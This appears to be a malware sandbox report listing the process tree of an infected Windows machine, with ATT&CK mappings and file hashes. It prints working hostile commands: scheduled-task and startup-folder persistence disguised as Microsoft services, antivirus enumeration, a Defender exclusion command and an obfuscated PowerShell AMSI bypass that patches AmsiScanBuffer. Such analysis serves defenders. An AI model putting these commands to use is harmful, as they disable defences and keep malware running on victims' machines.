- Delays execution with timeout.exe
PID:3008
-
-
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\Admin\AppData\Local\Temp\Files\p4cof96p.exe"4⤵PID:4752
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak5⤵
- Delays execution with timeout.exe
PID:15216
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\DivineDialogue.exe"C:\Users\Admin\AppData\Local\Temp\Files\DivineDialogue.exe"3⤵PID:308
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c move Prerequisite Prerequisite.bat & Prerequisite.bat4⤵PID:9028
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:15028
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"5⤵PID:15368
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:5392
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"5⤵PID:15244
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 1158395⤵PID:9536
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "ISTTRANSACTIONSCONFCOMMENTARY" Grew5⤵PID:16296
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Butter + ..\Community + ..\Efficiently + ..\Tyler + ..\Seas + ..\California + ..\Skip + ..\Publisher + ..\Disappointed + ..\We + ..\Ll + ..\Time + ..\Terrible + ..\Anal + ..\Fleece + ..\Always + ..\Tcp l5⤵PID:3748
-
-
C:\Users\Admin\AppData\Local\Temp\115839\Leaving.pifLeaving.pif l5⤵PID:4940
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵PID:15444
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\discord.exe"C:\Users\Admin\AppData\Local\Temp\Files\discord.exe"3⤵PID:14468
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Microsoft Service" /sc ONLOGON /tr "C:\Windows\system32\SubDir\main-pc.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:11272
-
-
C:\Windows\system32\SubDir\main-pc.exe"C:\Windows\system32\SubDir\main-pc.exe"4⤵PID:12824
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Microsoft Service" /sc ONLOGON /tr "C:\Windows\system32\SubDir\main-pc.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:16228
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\300.exe"C:\Users\Admin\AppData\Local\Temp\Files\300.exe"3⤵PID:16024
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:14180
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:7480
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7480 -s 20125⤵
- Program crash
PID:13884
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"3⤵PID:15184
-
-
C:\Users\Admin\AppData\Local\Temp\Files\crack.exe"C:\Users\Admin\AppData\Local\Temp\Files\crack.exe"3⤵PID:12884
-
-
C:\Users\Admin\AppData\Local\Temp\Files\svcyr.exe"C:\Users\Admin\AppData\Local\Temp\Files\svcyr.exe"3⤵PID:12780
-
-
C:\Users\Admin\AppData\Local\Temp\Files\msf.exe"C:\Users\Admin\AppData\Local\Temp\Files\msf.exe"3⤵PID:16324
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 16324 -s 12204⤵
- Program crash
PID:9784
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 16324 -s 12284⤵
- Program crash
PID:2016
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Identification-1.exe"C:\Users\Admin\AppData\Local\Temp\Files\Identification-1.exe"3⤵PID:12500
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F2⤵
- System Location Discovery: System Language Discovery
PID:4272 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3632
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F3⤵
- Scheduled Task/Job: Scheduled Task
PID:2696
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & echo URL="C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & exit2⤵
- Drops startup file
PID:4260
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:4276
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"2⤵PID:760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:4512
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4368
-
-
C:\Windows\System32\dwm.exeC:\Windows\System32\dwm.exe2⤵PID:648
-
-
C:\Users\Admin\AppData\Local\Temp\D6BF.tmp.ssg.exe"C:\Users\Admin\AppData\Local\Temp\D6BF.tmp.ssg.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:916
-
-
C:\Users\Admin\AppData\Local\Temp\E333.tmp.zx.exe"C:\Users\Admin\AppData\Local\Temp\E333.tmp.zx.exe"2⤵
- Executes dropped EXE
PID:784 -
C:\Users\Admin\AppData\Local\Temp\E333.tmp.zx.exe"C:\Users\Admin\AppData\Local\Temp\E333.tmp.zx.exe"3⤵
- Executes dropped EXE
PID:3484
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:9736
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"2⤵PID:6972
-
-
C:\Windows\SysWOW64\cmd.execmd /c schtasks.exe /create /tn "Enjoy" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SkySync Technologies\SkySync.js'" /sc minute /mo 5 /F2⤵
- System Location Discovery: System Language Discovery
PID:2536 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "Enjoy" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SkySync Technologies\SkySync.js'" /sc minute /mo 5 /F3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:9516
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SkySync.url" & echo URL="C:\Users\Admin\AppData\Local\SkySync Technologies\SkySync.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SkySync.url" & exit2⤵
- Drops startup file
- System Location Discovery: System Language Discovery
PID:6692
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:12048
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵PID:13028
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵PID:12876
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵PID:6688
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵PID:8988
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵PID:3924
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵PID:5132
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵PID:12664
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵PID:9264
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3976 -ip 39761⤵PID:3240
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1500 -ip 15001⤵PID:4748
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 200 -p 3484 -ip 34841⤵PID:3508
-
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:564
-
C:\Users\Admin\Windows.exeC:\Users\Admin\Windows.exe1⤵
- Executes dropped EXE
PID:1692
-
C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe1⤵
- Executes dropped EXE
PID:4496
-
C:\Users\Admin\Windows.exeC:\Users\Admin\Windows.exe1⤵
- Executes dropped EXE
PID:3468
-
C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe1⤵
- Executes dropped EXE
PID:4728
-
C:\Users\Admin\Windows.exeC:\Users\Admin\Windows.exe1⤵
- Executes dropped EXE
PID:2628
-
C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe1⤵
- Executes dropped EXE
PID:2256
-
C:\Users\Admin\Windows.exeC:\Users\Admin\Windows.exe1⤵PID:1128
-
C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe1⤵PID:3172
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 840 -ip 8401⤵PID:2724
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:8284
-
C:\Windows\system32\wscript.EXEC:\Windows\system32\wscript.EXE //B "C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js"1⤵PID:1128
-
C:\Users\Admin\Windows.exeC:\Users\Admin\Windows.exe1⤵PID:4508
-
C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe1⤵PID:2176
-
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:14428
-
C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe1⤵PID:2644
-
C:\Users\Admin\Windows.exeC:\Users\Admin\Windows.exe1⤵PID:6216
-
C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe1⤵PID:10480
-
C:\Users\Admin\Windows.exeC:\Users\Admin\Windows.exe1⤵PID:6372
-
C:\Users\Admin\AppData\Local\Temp\Files\softina.exeC:\Users\Admin\AppData\Local\Temp\Files\softina.exe1⤵PID:15456
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Files\softina.exe"; Add-MpPreference -ExclusionProcess "softina.exe"; exit"2⤵
- Command and Scripting Interpreter: PowerShell
PID:10660
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:kghZkUputjyu{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$CdiDHPdGvYdGwv,[Parameter(Position=1)][Type]$CyPsAtBpII)$VStOtehUZzi=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+'l'+''+[Char](101)+''+'c'+''+[Char](116)+'e'+'d'+'De'+'l'+''+[Char](101)+''+[Char](103)+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+'e'+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+'Mo'+'d'+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+'g'+[Char](97)+''+'t'+''+'e'+''+'T'+''+[Char](121)+''+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+'e'+[Char](97)+''+'l'+''+'e'+''+'d'+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+'i'+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+'A'+''+'u'+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+'as'+[Char](115)+'',[MulticastDelegate]);$VStOtehUZzi.DefineConstructor(''+'R'+''+'T'+''+'S'+''+'p'+'e'+[Char](99)+''+'i'+'a'+'l'+''+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+','+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+'B'+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$CdiDHPdGvYdGwv).SetImplementationFlags('R'+'u'+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+'an'+'a'+'g'+[Char](101)+'d');$VStOtehUZzi.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+'ok'+[Char](101)+'',''+'P'+''+[Char](117)+'b'+'l'+''+'i'+''+'c'+''+[Char](44)+''+[Char](72)+'ide'+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+'S'+'l'+''+[Char](111)+''+[Char](116)+',V'+'i'+'r'+'t'+'u'+[Char](97)+''+'l'+'',$CyPsAtBpII,$CdiDHPdGvYdGwv).SetImplementationFlags('R'+[Char](117)+''+'n'+'t'+'i'+''+[Char](109)+''+[Char](101)+''+','+'M'+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $VStOtehUZzi.CreateType();}$lyFDVZEupkmzq=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+'M'+'i'+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+'f'+''+[Char](116)+'.'+[Char](87)+''+[Char](105)+'n'+'3'+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+'a'+''+[Char](102)+'e'+'N'+''+[Char](97)+''+[Char](116)+''+[Char](105)+'v'+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+'o'+'ds');$uNMBOihsyjlQsR=$lyFDVZEupkmzq.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'P'+[Char](114)+''+[Char](111)+''+'c'+''+[Char](65)+'d'+[Char](100)+'r'+'e'+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+''+'t'+'a'+[Char](116)+'ic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$qFOtEYwcgubRaCFEdNT=kghZkUputjyu @([String])([IntPtr]);$rpOXySwxbXPOUYsrsOGDKK=kghZkUputjyu @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$lMNSxSBTzGf=$lyFDVZEupkmzq.GetMethod('Ge'+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+'l'+''+[Char](101)+'H'+[Char](97)+'n'+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+'n'+'el'+'3'+''+'2'+''+[Char](46)+''+[Char](100)+'ll')));$osIWQUpNnQIJsW=$uNMBOihsyjlQsR.Invoke($Null,@([Object]$lMNSxSBTzGf,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+'b'+'r'+'aryA')));$BtUIXLEGozWCXrPYa=$uNMBOihsyjlQsR.Invoke($Null,@([Object]$lMNSxSBTzGf,[Object](''+'V'+'ir'+[Char](116)+''+'u'+''+'a'+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+'o'+''+'t'+''+'e'+''+[Char](99)+''+'t'+'')));$amfVfuO=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($osIWQUpNnQIJsW,$qFOtEYwcgubRaCFEdNT).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+'i'+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'');$SRXxdumTGWOeEdVmy=$uNMBOihsyjlQsR.Invoke($Null,@([Object]$amfVfuO,[Object](''+'A'+'m'+'s'+''+'i'+''+[Char](83)+''+'c'+''+[Char](97)+''+'n'+''+[Char](66)+''+'u'+''+'f'+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$SkmhVrMIDK=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BtUIXLEGozWCXrPYa,$rpOXySwxbXPOUYsrsOGDKK).Invoke($SRXxdumTGWOeEdVmy,[uint32]8,4,[ref]$SkmhVrMIDK);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SRXxdumTGWOeEdVmy,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BtUIXLEGozWCXrPYa,$rpOXySwxbXPOUYsrsOGDKK).Invoke($SRXxdumTGWOeEdVmy,[uint32]8,0x20,[ref]$SkmhVrMIDK);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+'F'+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue('d'+[Char](105)+''+'a'+''+[Char](108)+'e'+[Char](114)+''+[Char](115)+''+[Char](116)+'ag'+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"1⤵
- Command and Scripting Interpreter: PowerShell
PID:7812
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:5960
-
C:\Windows\explorer.exeexplorer.exe /LOADSAVEDWINDOWS2⤵PID:7828
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca1⤵PID:15392
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:5328
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca1⤵PID:8800
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca1⤵PID:9568
-
C:\Users\Admin\Windows.exeC:\Users\Admin\Windows.exe1⤵PID:11764
-
C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe1⤵PID:11292
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca1⤵PID:5400
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca1⤵PID:5352
-
C:\Windows\yqsmqw.exeC:\Windows\yqsmqw.exe1⤵PID:15836
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca1⤵PID:11156
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 16324 -ip 163241⤵PID:15896
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 16324 -ip 163241⤵PID:11336
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k DcomLaunch1⤵PID:6348
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 7480 -ip 74801⤵PID:8640
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{2070b910-0ebc-41f9-b68f-4a729ad5d00e}1⤵PID:11732
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2JavaScript
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Windows Management Instrumentation
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Direct Volume Access
1File and Directory Permissions Modification
2Windows File and Directory Permissions Modification
1Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
1Indicator Removal
3File Deletion
3Modify Registry
5Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
5Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
6Credentials In Files
5Credentials in Registry
1Discovery
Browser Information Discovery
1File and Directory Discovery
2Process Discovery
1Query Registry
7System Information Discovery
5System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Wi-Fi Discovery
1Virtualization/Sandbox Evasion
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
119KB
MD5c70ed186b656df4ad5b512bda26f6933
SHA1db8d501252832adafd083fc0f3e308df33669482
SHA2568108c2efbf923e9fb7c8b8e1634c17e1f91e1ef277791845135f3452a48d09bc
SHA5121f335ce05a696062bf82154ece2726eda3bbc99f0b69f19fe210d735dc33c137844be1e302d404a389aaff0d08f7eaa229301ba811af0489932d0b5171f624c5
-
C:\Program Files\Common Files\microsoft shared\ClickToRun\AppvIsvSubsystems64.dll.id-1686D269.[[email protected]].ncov
Filesize3.2MB
MD577c0bf514a435e75e9e38bf4b4cd7a0b
SHA1e001d683b69e3394cb294d357d0f0b2be22f90fe
SHA256bb9907ca9d74280f335b8b54ffc33eec9c4f42082327e9a0b07358e50c41c67c
SHA5125d60756d6e409d4064c52d273361fe7857811f90f02f1129f0a8606ab1d80698429ddd36673efaa6094b4972647d7ade4216e6968418715573a1322dca541422
-
Filesize
174B
MD5e0fd7e6b4853592ac9ac73df9d83783f
SHA12834e77dfa1269ddad948b87d88887e84179594a
SHA256feea416e5e5c8aa81416b81fb25132d1c18b010b02663a253338dbdfb066e122
SHA512289de77ffbe328388ad080129b7460712985d42076e78a3a545124881c30f564c5ef8fb4024d98903d88a6a187c60431a600f6ecbbe2888ee69e40a67ce77b55
-
Filesize
1024KB
